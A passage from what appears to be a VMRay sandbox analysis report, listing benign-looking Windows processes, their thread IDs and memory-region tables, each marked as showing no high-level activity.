|---|---|
| PID | 0x7f8 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
FB8
0x
FB4
0x
A30
0x
A1C
0x
854
0x
83C
0x
808
0x
11C
0x
610
0x
60C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000003cd1d40000 | 0x3cd1d40000 | 0x3cd1d4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000003cd1d50000 | 0x3cd1d50000 | 0x3cd1d50fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd1d60000 | 0x3cd1d60000 | 0x3cd1d73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003cd1d80000 | 0x3cd1d80000 | 0x3cd1dfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd1e00000 | 0x3cd1e00000 | 0x3cd1e03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003cd1e10000 | 0x3cd1e10000 | 0x3cd1e11fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003cd1e20000 | 0x3cd1e20000 | 0x3cd1e21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd1e30000 | 0x3cd1e30000 | 0x3cd1e36fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x3cd1e40000 | 0x3cd1efdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003cd1f00000 | 0x3cd1f00000 | 0x3cd1ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd2000000 | 0x3cd2000000 | 0x3cd207ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd2080000 | 0x3cd2080000 | 0x3cd20fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd2100000 | 0x3cd2100000 | 0x3cd2100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd2110000 | 0x3cd2110000 | 0x3cd2110fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x3cd2120000 | 0x3cd2123fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db | 0x3cd2130000 | 0x3cd2172fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x3cd2180000 | 0x3cd2183fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000003cd2190000 | 0x3cd2190000 | 0x3cd2190fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd21a0000 | 0x3cd21a0000 | 0x3cd21a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003cd21b0000 | 0x3cd21b0000 | 0x3cd21d9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd21e0000 | 0x3cd21e0000 | 0x3cd21e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003cd21f0000 | 0x3cd21f0000 | 0x3cd21f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd2200000 | 0x3cd2200000 | 0x3cd2206fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd2210000 | 0x3cd2210000 | 0x3cd228ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd2290000 | 0x3cd2290000 | 0x3cd2290fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd22a0000 | 0x3cd22a0000 | 0x3cd22a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windows.storage.dll.mui | 0x3cd22b0000 | 0x3cd22b7fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000003cd22c0000 | 0x3cd22c0000 | 0x3cd22c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003cd22d0000 | 0x3cd22d0000 | 0x3cd22d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd22e0000 | 0x3cd22e0000 | 0x3cd22e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003cd22f0000 | 0x3cd22f0000 | 0x3cd22f8fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd2300000 | 0x3cd2300000 | 0x3cd23fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003cd2400000 | 0x3cd2400000 | 0x3cd2587fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003cd2590000 | 0x3cd2590000 | 0x3cd2710fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003cd2720000 | 0x3cd2720000 | 0x3cd3b1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x3cd3b20000 | 0x3cd3e56fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003cd3e60000 | 0x3cd3e60000 | 0x3cd3edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd3ee0000 | 0x3cd3ee0000 | 0x3cd3f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd3f60000 | 0x3cd3f60000 | 0x3cd3fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd3fe0000 | 0x3cd3fe0000 | 0x3cd40dffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x3cd40e0000 | 0x3cd40e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003cd40f0000 | 0x3cd40f0000 | 0x3cd40f8fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd4100000 | 0x3cd4100000 | 0x3cd41fffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x3cd4200000 | 0x3cd428afff | Memory Mapped File | r |
|
|
|
- |
| shell32.dll.mui | 0x3cd4290000 | 0x3cd42f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003cd4400000 | 0x3cd4400000 | 0x3cd4423fff | Private Memory | rw |
|
|
|
- |
| propsys.dll.mui | 0x3cd4430000 | 0x3cd4440fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003cd4460000 | 0x3cd4460000 | 0x3cd455ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd4560000 | 0x3cd4560000 | 0x3cd4583fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd4600000 | 0x3cd4600000 | 0x3cd46fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd4700000 | 0x3cd4700000 | 0x3cd47fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003cd4800000 | 0x3cd4800000 | 0x3cd48fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffbe0000 | 0x7df5ffbe0000 | 0x7ff5ffbdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff609b8a000 | 0x7ff609b8a000 | 0x7ff609b8bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609b8c000 | 0x7ff609b8c000 | 0x7ff609b8dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609b8e000 | 0x7ff609b8e000 | 0x7ff609b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff609b90000 | 0x7ff609b90000 | 0x7ff609c8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff609c90000 | 0x7ff609c90000 | 0x7ff609cb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff609cb4000 | 0x7ff609cb4000 | 0x7ff609cb5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609cb6000 | 0x7ff609cb6000 | 0x7ff609cb7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609cb8000 | 0x7ff609cb8000 | 0x7ff609cb9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609cba000 | 0x7ff609cba000 | 0x7ff609cbbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609cbc000 | 0x7ff609cbc000 | 0x7ff609cbdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff609cbe000 | 0x7ff609cbe000 | 0x7ff609cbefff | Private Memory | rw |
|
|
|
- |
| runtimebroker.exe | 0x7ff60a170000 | 0x7ff60a185fff | Memory Mapped File | rwx |
|
|
|
- |
| ntoskrnl.exe | 0x7ff6efa30000 | 0x7ff6f0281fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.search.dll | 0x7ffc3f500000 | 0x7ffc3f5cafff | Memory Mapped File | rwx |
|
|
|
- |
| structuredquery.dll | 0x7ffc3f5d0000 | 0x7ffc3f686fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.networking.hostname.dll | 0x7ffc42260000 | 0x7ffc42297fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.internal.shell.broker.dll | 0x7ffc44180000 | 0x7ffc44211fff | Memory Mapped File | rwx |
|
|
|
- |
| authbroker.dll | 0x7ffc44ce0000 | 0x7ffc44d05fff | Memory Mapped File | rwx |
|
|
|
- |
| msauserext.dll | 0x7ffc44d10000 | 0x7ffc44d29fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.security.authentication.onlineid.dll | 0x7ffc44de0000 | 0x7ffc44e92fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.networking.connectivity.dll | 0x7ffc469c0000 | 0x7ffc46a6bfff | Memory Mapped File | rwx |
|
|
|
- |
| wwapi.dll | 0x7ffc46cf0000 | 0x7ffc46d05fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc48ff0000 | 0x7ffc49459fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffc4b030000 | 0x7ffc4b072fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffc4b090000 | 0x7ffc4b09dfff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ffc4b170000 | 0x7ffc4b1cefff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7ffc4b290000 | 0x7ffc4b536fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.ui.immersive.dll | 0x7ffc4dc10000 | 0x7ffc4ddc6fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc4ddd0000 | 0x7ffc4e145fff | Memory Mapped File | rwx |
|
|
|
- |
| mrmcorer.dll | 0x7ffc4f1f0000 | 0x7ffc4f2fefff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffc50c00000 | 0x7ffc50d30fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7ffc50ec0000 | 0x7ffc50ed7fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffc514b0000 | 0x7ffc514c5fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x7ffc51e70000 | 0x7ffc52021fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffc52730000 | 0x7ffc527f7fff | Memory Mapped File | rwx |
|
|
|
- |
| sppc.dll | 0x7ffc52bd0000 | 0x7ffc52bf4fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7ffc52c00000 | 0x7ffc52c25fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffc52cd0000 | 0x7ffc52d47fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc53830000 | 0x7ffc5383bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffc54440000 | 0x7ffc544d7fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc559d0000 | 0x7ffc56ef4fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #66: shellexperiencehost.exe
0
0
| Information | Value |
|---|---|
| ID | #66 |
| File Name | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe |
| Command Line | "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca |
| Initial Working Directory | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x980 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2E0
0x
53C
0x
7A4
0x
BFC
0x
BF4
0x
BF0
0x
BEC
0x
BE8
0x
BE4
0x
BE0
0x
BDC
0x
BD8
0x
BD4
0x
BD0
0x
BCC
0x
BC8
0x
BC4
0x
BC0
0x
BBC
0x
BB8
0x
BB4
0x
BB0
0x
BA0
0x
B9C
0x
B98
0x
B94
0x
B34
0x
B1C
0x
B0C
0x
9D0
0x
9C8
0x
9C4
0x
9C0
0x
9BC
0x
9B0
0x
9AC
0x
9A8
0x
9A4
0x
9A0
0x
99C
0x
998
0x
994
0x
990
0x
984
|
Process #67: searchui.exe
0
0
| Information | Value |
|---|---|
| ID | #67 |
| File Name | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe |
| Command Line | "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e4 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B80
0x
FA4
0x
FA0
0x
B28
0x
B14
0x
AFC
0x
AF0
0x
AC0
0x
ABC
0x
AB8
0x
AAC
0x
AA8
0x
AA4
0x
AA0
0x
A9C
0x
A98
0x
A88
0x
A28
0x
A20
0x
A18
0x
A08
0x
A04
0x
9FC
0x
9E8
|
Process #68: backgroundtaskhost.exe
0
0
| Information | Value |
|---|---|
| ID | #68 |
| File Name | c:\windows\system32\backgroundtaskhost.exe |
| Command Line | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4f0 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E88
0x
EA8
0x
FC0
0x
FB0
0x
C90
0x
C88
0x
C84
0x
C80
0x
754
|
Process #69: commands-xerox-relationship.exe
0
0
| Information | Value |
|---|---|
| ID | #69 |
| File Name | c:\program files (x86)\windows multimedia platform\commands-xerox-relationship.exe |
| Command Line | "C:\Program Files (x86)\Windows Multimedia Platform\commands-xerox-relationship.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Multimedia Platform\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x54c |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DBC
0x
A3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| commands-xerox-relationship.exe | 0x00010000 | 0x00026fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x008e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x00903fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x00a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00a71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00ae3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00c20000 | 0x00cddfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00f67fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f70000 | 0x00f70000 | 0x01027fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001030000 | 0x01030000 | 0x0106ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000010b0000 | 0x010b0000 | 0x01230fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001240000 | 0x01240000 | 0x0263ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x0280ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eba0000 | 0x7eba0000 | 0x7ec9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eca0000 | 0x7eca0000 | 0x7ecc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ecc4000 | 0x7ecc4000 | 0x7ecc6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecc7000 | 0x7ecc7000 | 0x7ecc7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecc9000 | 0x7ecc9000 | 0x7ecc9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eccd000 | 0x7eccd000 | 0x7eccffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #70: recorder.exe
0
0
| Information | Value |
|---|---|
| ID | #70 |
| File Name | c:\program files\windows mail\recorder.exe |
| Command Line | "C:\Program Files\Windows Mail\recorder.exe" |
| Initial Working Directory | C:\Program Files\Windows Mail\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7c4 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DB8
0x
EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| recorder.exe | 0x000b0000 | 0x000c6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00343fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00361fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00370000 | 0x0042dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x00470fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00483fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00907fff | Pagefile Backed Memory | r |
|
|
|
- |
